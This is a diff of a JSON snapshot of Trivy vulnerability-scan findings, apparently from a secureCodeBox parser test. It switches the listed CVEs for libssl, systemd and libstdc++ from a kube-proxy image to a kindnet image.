"description": +"The public API function BIO_new_NDEF is a helper function used for streaming ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by end user applications. @@ -163433,8 +163153,9 @@ The OpenSSL cms and smime command line applications are similarly affected. -", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", +" +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "use-after-free following BIO_new_NDEF", "references": [ @@ -163651,10 +163372,10 @@ The OpenSSL cms and smime command line applications are similarly affected. }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0286", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2023:2165", @@ -163714,7 +163435,7 @@ The OpenSSL cms and smime command line applications are similarly affected. }, "category": "Vulnerability", "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "X.400 address type confusion in X.509 GeneralName", "references": [ @@ -163939,10 +163660,10 @@ The OpenSSL cms and smime command line applications are similarly affected. }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u5", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0464", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "https://access.redhat.com/security/cve/CVE-2023-0464", @@ -163951,8 +163672,6 @@ The OpenSSL cms and smime command line applications are similarly affected. "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", - "https://linux.oracle.com/cve/CVE-2023-0464.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", "https://ubuntu.com/security/notices/USN-6039-1", @@ -163962,7 +163681,8 @@ The OpenSSL cms and smime command line applications are similarly affected. ], }, "category": "Vulnerability", - "description": "A security vulnerability has been identified in all supported versions + "description": +"A security vulnerability has been identified in all supported versions of OpenSSL related to the verification of X.509 certificate chains that include policy constraints. Attackers may be able to exploit this @@ -163972,8 +163692,9 @@ exponential use of computational resources, leading to a denial-of-service Policy processing is disabled by default but can be enabled by passing the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", "references": [ @@ -164005,14 +163726,6 @@ the \`-policy' argument to the command line utilities or by calling the "type": "URL", "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0464.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", - }, { "type": "URL", "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", @@ -164042,10 +163755,10 @@ the \`-policy' argument to the command line utilities or by calling the }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u5", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-2650", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "http://www.openwall.com/lists/oss-security/2023/05/30/1", @@ -164055,20 +163768,18 @@ the \`-policy' argument to the command line utilities or by calling the "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://linux.oracle.com/cve/CVE-2023-2650.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", "https://ubuntu.com/security/notices/USN-6119-1", - "https://ubuntu.com/security/notices/USN-6188-1", "https://www.cve.org/CVERecord?id=CVE-2023-2650", "https://www.debian.org/security/2023/dsa-5417", "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or data containing them may be very slow. Impact summary: Applications that use OBJ_obj2txt() directly, or use any of @@ -164116,8 +163827,9 @@ In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, such as X.509 certificates. This is assumed to not happen in such a way that it would cause a Denial of Service, so these versions are considered not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "Possible DoS translating ASN.1 object identifiers", "references": [ @@ -164153,14 +163865,6 @@ and the severity is therefore considered low.", "type": "URL", "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", - }, { "type": "URL", "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", @@ -164177,10 +163881,6 @@ and the severity is therefore considered low.", "type": "URL", "value": "https://ubuntu.com/security/notices/USN-6119-1", }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6188-1", - }, { "type": "URL", "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", @@ -164198,93 +163898,10 @@ and the severity is therefore considered low.", }, { "attributes": { - "fixedVersion": "1.1.1d-0+deb10u8", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-4160", - "installedVersion": "1.1.1d-0+deb10u6", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-4160", - "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3bf7b73ea7123045b8f972badc67ed6878e6c37f", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6fc1aaaf303185aa5e483e06bdfae16daa9193a7", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e9e726506cd2a3fd9c0f12daf8cc1fe934c7dddb", - "https://nvd.nist.gov/vuln/detail/CVE-2021-4160", - "https://security.gentoo.org/glsa/202210-02", - "https://www.cve.org/CVERecord?id=CVE-2021-4160", - "https://www.debian.org/security/2022/dsa-5103", - "https://www.openssl.org/news/secadv/20220128.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - ], - }, - "category": "Vulnerability", - "description": "There is a carry propagation bug in the MIPS32 and MIPS64 squaring procedure. Many EC algorithms are affected, including some of the TLS 1.3 default curves. Impact was not analyzed in detail, because the pre-requisites for attack are considered unlikely and include reusing private keys. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH private key among multiple clients, which is no longer an option since CVE-2016-0701. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0.0. It was addressed in the releases of 1.1.1m and 3.0.1 on the 15th of December 2021. For the 1.0.2 release it is addressed in git commit 6fc1aaaf3 that is available to premium support customers only. It will be made available in 1.0.2zc when it is released. The issue only affects OpenSSL on MIPS platforms. Fixed in OpenSSL 3.0.1 (Affected 3.0.0). Fixed in OpenSSL 1.1.1m (Affected 1.1.1-1.1.1l). Fixed in OpenSSL 1.0.2zc-dev (Affected 1.0.2-1.0.2zb).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "openssl: Carry propagation bug in the MIPS32 and MIPS64 squaring procedure", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-4160", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-4160", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3bf7b73ea7123045b8f972badc67ed6878e6c37f", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6fc1aaaf303185aa5e483e06bdfae16daa9193a7", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e9e726506cd2a3fd9c0f12daf8cc1fe934c7dddb", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4160", - }, - { - "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-4160", - }, - { - "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5103", - }, - { - "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220128.txt", - }, - { - "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", - }, - { - "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", - }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-2097", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2022:6224", @@ -164326,7 +163943,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "AES OCB fails to encrypt some bytes", "references": [ @@ -164479,10 +164096,10 @@ and the severity is therefore considered low.", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-4304", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2023:2165", @@ -164533,7 +164150,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "timing attack in RSA Decryption implementation", "references": [ @@ -164722,10 +164339,10 @@ and the severity is therefore considered low.", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u5", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0465", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "https://access.redhat.com/security/cve/CVE-2023-0465", @@ -164734,8 +164351,6 @@ and the severity is therefore considered low.", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", - "https://linux.oracle.com/cve/CVE-2023-0465.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", "https://security.netapp.com/advisory/ntap-20230414-0001/", @@ -164746,7 +164361,8 @@ and the severity is therefore considered low.", ], }, "category": "Vulnerability", - "description": "Applications that use a non-default option when verifying certificates may be + "description": +"Applications that use a non-default option when verifying certificates may be vulnerable to an attack from a malicious CA to circumvent certain checks. Invalid certificate policies in leaf certificates are silently ignored by @@ -164756,8 +164372,9 @@ in order to circumvent policy checking on the certificate altogether. Policy processing is disabled by default but can be enabled by passing the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "Invalid certificate policies in leaf certificates are silently ignored", "references": [ @@ -164789,14 +164406,6 @@ the \`-policy' argument to the command line utilities or by calling the "type": "URL", "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0465.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", - }, { "type": "URL", "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", @@ -164830,10 +164439,10 @@ the \`-policy' argument to the command line utilities or by calling the }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u5", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0466", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "https://access.redhat.com/security/cve/CVE-2023-0466", @@ -164842,8 +164451,6 @@ the \`-policy' argument to the command line utilities or by calling the "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", - "https://linux.oracle.com/cve/CVE-2023-0466.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", "https://security.netapp.com/advisory/ntap-20230414-0001/", @@ -164854,7 +164461,8 @@ the \`-policy' argument to the command line utilities or by calling the ], }, "category": "Vulnerability", - "description": "The function X509_VERIFY_PARAM_add0_policy() is documented to + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to implicitly enable the certificate policy check when doing certificate verification. However the implementation of the function does not enable the check which allows certificates with invalid or incorrect @@ -164870,8 +164478,9 @@ enable the policy check by calling X509_VERIFY_PARAM_set_flags() with the X509_V_FLAG_POLICY_CHECK flag argument. Certificate policy checks are disabled by default in OpenSSL and are not -commonly used by applications.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", +commonly used by applications." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "Certificate policy check not enabled", "references": [ @@ -164903,14 +164512,6 @@ commonly used by applications.", "type": "URL", "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0466.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", - }, { "type": "URL", "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", @@ -164945,9 +164546,9 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2007-6755", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", @@ -164965,7 +164566,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "Dual_EC_DRBG: weak pseudo random number generator", "references": [ @@ -165023,9 +164624,9 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2010-0928", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", @@ -165041,7 +164642,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "openssl: RSA authentication weakness", "references": [ @@ -165090,612 +164691,732 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-12886", - "installedVersion": "8.3.0-6", - "packageName": "libstdc++6", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-12886", - "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", - "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", - "https://www.cve.org/CVERecord?id=CVE-2018-12886", - "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", ], }, "category": "Vulnerability", - "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", + "name": "buffer overrun in format_timespan() function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-12886", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-12886", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-15847", - "installedVersion": "8.3.0-6", - "packageName": "libstdc++6", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", - "https://access.redhat.com/security/cve/CVE-2019-15847", - "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", - "https://linux.oracle.com/cve/CVE-2019-15847.html", - "https://linux.oracle.com/errata/ELSA-2020-1864.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", - "https://www.cve.org/CVERecord?id=CVE-2019-15847", - ], - }, - "category": "Vulnerability", - "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-15847", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-15847", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", + 